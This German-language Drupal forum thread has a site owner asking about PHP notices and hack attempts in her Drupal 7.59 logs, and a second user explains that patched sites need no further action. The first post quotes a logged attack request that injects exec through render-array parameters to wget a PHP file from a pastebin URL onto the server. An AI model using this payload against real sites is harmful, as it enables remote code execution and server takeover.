Startseite
  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche
Startseite › Forum › Drupalcenter.de › Allgemeines zu Drupal ›

[gelöst] Notices warnings und hack attempt in Drupal 7.59

Eingetragen von Jenna (1883)
am 30.05.2018 - 20:49 Uhr in
  • Allgemeines zu Drupal
  • Drupal 7.x oder neuer

Ich habe seit einigen Tagen in den Protokollberichten einige dieser Warnungen, die mit PHP angezeigt werden oder Zugriff verweigert.

https://www.drupal.org/project/drupal/issues/2975433

Zitat:

Notice: Undefined index: #prefix in file_ajax_upload() (line 287 of /var/www/html/modules/file/file.module)

, plus 3 - 4 weitere Meldungen, die sich auf ajax beziehen

und

https://www.drupal.org/forum/support/post-installation/2018-04-24/hack-a...

Zitat:

https://www.example.com/?q=user/password&name[%23post_render][]=exec&name[%23markup]=wget+-O+misc%2fAuthCommon.php+https%3a%2f%2fpastebin.com%2fraw%2fmibqDZX4&name[%23type]=markup

Kann jemand helfen, ich werde aus den Issues nicht schlau ob man was unternehmen muß? Was genau steht da soll man tun?
Module und Core sind natürlich auf neuestem Stand.

Ich kann keine Veränderung in den FTP Dateien feststellen, auch sonst läuft die Seite normal, trotzdem nervt das.

Die IP's zu diesen Zugriffen habe ich umgehend gesperrt.

Ja, liebe DSGVO... genau für so etwas braucht man Zugriff auf die IP, um die Sicherheit der Seite zu erhalten und das werde ich auch mit "Sicherheit" nicht ändern...

Grüße Jenna

‹ Fatal error: Allowed memory size - nach Umzug bei gleichem Provider [gelöst] Notices warnings und hack attempt in Drupal 7.59 ›
  • Anmelden oder Registrieren um Kommentare zu schreiben

Wie ich es verstehe, soll man

Eingetragen von eigentor (1424)
am 30.05.2018 - 21:09 Uhr

Wie ich es verstehe, soll man überhaupt nichts tun.
Man teilt in den Issues mehr die Info, dass es sich um Hack-Versuche handelt.
Die Versuche waren wahrscheinlich erfolglos, wenn du rechtzeitig upgedatet hattest.

In dem einen Issue meint ja einer, sollte man lieber die Notices ausblenden, weil das das Log zuspammt.
Vermutlich wirst du aktuell selber ein Modul schreiben müssen, wenn du die Sachen nicht geloggt haben willst.
Ich persönlich würde lieber den Spam akzeptieren und merken, dass jemand mich zu hacken versucht.
Ich habe immer so viel Error Spam durch aus Faulheit nicht gefixte Fehler in meinem eigenen Code, dass das den Braten auch nicht mehr fett macht...

  • Anmelden oder Registrieren um Kommentare zu schreiben

Die Meldungen sind rapide

Eingetragen von Jenna (1883)
am 10.07.2018 - 16:20 Uhr

Die Meldungen sind rapide zurück gegangen, da ich die IPs händisch sperre.. nur ganz vereinzelt taucht noch mal so ein Versuch auf.
Ich halte auch nichts davon Notices auszublenden, lieber etwas Handarbeit und man hat langfristig Ruhe..

Vielen Dank für deine Info (Updates hatte ich natürlich auch durchgeführt)

Grüße Jenna

  • Anmelden oder Registrieren um Kommentare zu schreiben

Benutzeranmeldung

  • Registrieren
  • Neues Passwort anfordern

Aktive Forenthemen

  • Medien und andere Daten mit Feeds von Drupal 7 auf Drupal 10 migrieren
  • für drupal11 ein Slider Modul
  • [gelöst] W3CSS Paragraphs Views
  • Drupal 11 neu aufsetzen und Bereiche aus 10 importieren
  • Wie erlaubt man neuen Benutzern auf die Resetseite zugreifen zu dürfen.
  • [gelöst] Anzeigeformat Text mit Bild in einem Artikel, Drupal 11
  • Social Media Buttons um Insteragram erweitern
  • Nach Installation der neuesten D10-Version kein Zugriff auf Website
  • Composer nach Umzug
  • [gelöst] Taxonomie Begriffe zeigt nicht alle Nodes an
  • Drupal 11 + Experience Builder (Canvas) + Layout Builder
  • Welche KI verwendet ihr?
Weiter

Neue Kommentare

  • Inzwischen sind wir bei
    vor 1 Woche 2 Tagen
  • Migrieren von D7 auf D8/ D10/ D11
    vor 1 Woche 3 Tagen
  • melde mich mal wieder, da ich
    vor 9 Wochen 4 Stunden
  • Hey danke
    vor 9 Wochen 23 Stunden
  • Update: jetzt gibt's ein
    vor 9 Wochen 1 Tag
  • Hallo, im Prinzip habe ich
    vor 9 Wochen 6 Tagen
  • Da scheint die Terminologie
    vor 9 Wochen 6 Tagen
  • Kannst doch auch alles direkt
    vor 10 Wochen 3 Tagen
  • In der entsprechenden View
    vor 10 Wochen 3 Tagen
  • Dazu müsstest Du vermutlich
    vor 10 Wochen 3 Tagen

Statistik

Beiträge im Forum: 250235
Registrierte User: 20462

Neue User:

  • marouane.blel
  • capilclinic
  • Quabzibboter

» Alle User anzeigen

User nach Punkten sortiert:
wla9461
stBorchert6003
quiptime4972
Tobias Bähr4019
bv3924
ronald3857
md3717
Thoor3678
Alexander Langer3416
Exterior2903
» User nach Punkten
Zur Zeit sind 0 User und 28 Gäste online.

Hauptmenü

  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche

Quicklinks I

  • Infos
  • Drupal Showcase
  • Installation
  • Update
  • Forum
  • Team
  • Verhaltensregeln

Quicklinks II

  • Drupal Jobs
  • FAQ
  • Drupal-Kochbuch
  • Best Practice - Drupal Sites - Guidelines
  • Drupal How To's

Quicklinks III

  • Tipps & Tricks
  • Drupal Theme System
  • Theme Handbuch
  • Leitfaden zur Entwicklung von Modulen

RSS & Twitter

  • Drupal Planet deutsch
  • RSS Feed News
  • RSS Feed Planet
  • Twitter Drupalcenter
Drupalcenter Team | Impressum & Datenschutz | Kontakt
Angetrieben von Drupal | Drupal is a registered trademark of Dries Buytaert.
Drupal Initiative - Drupal Association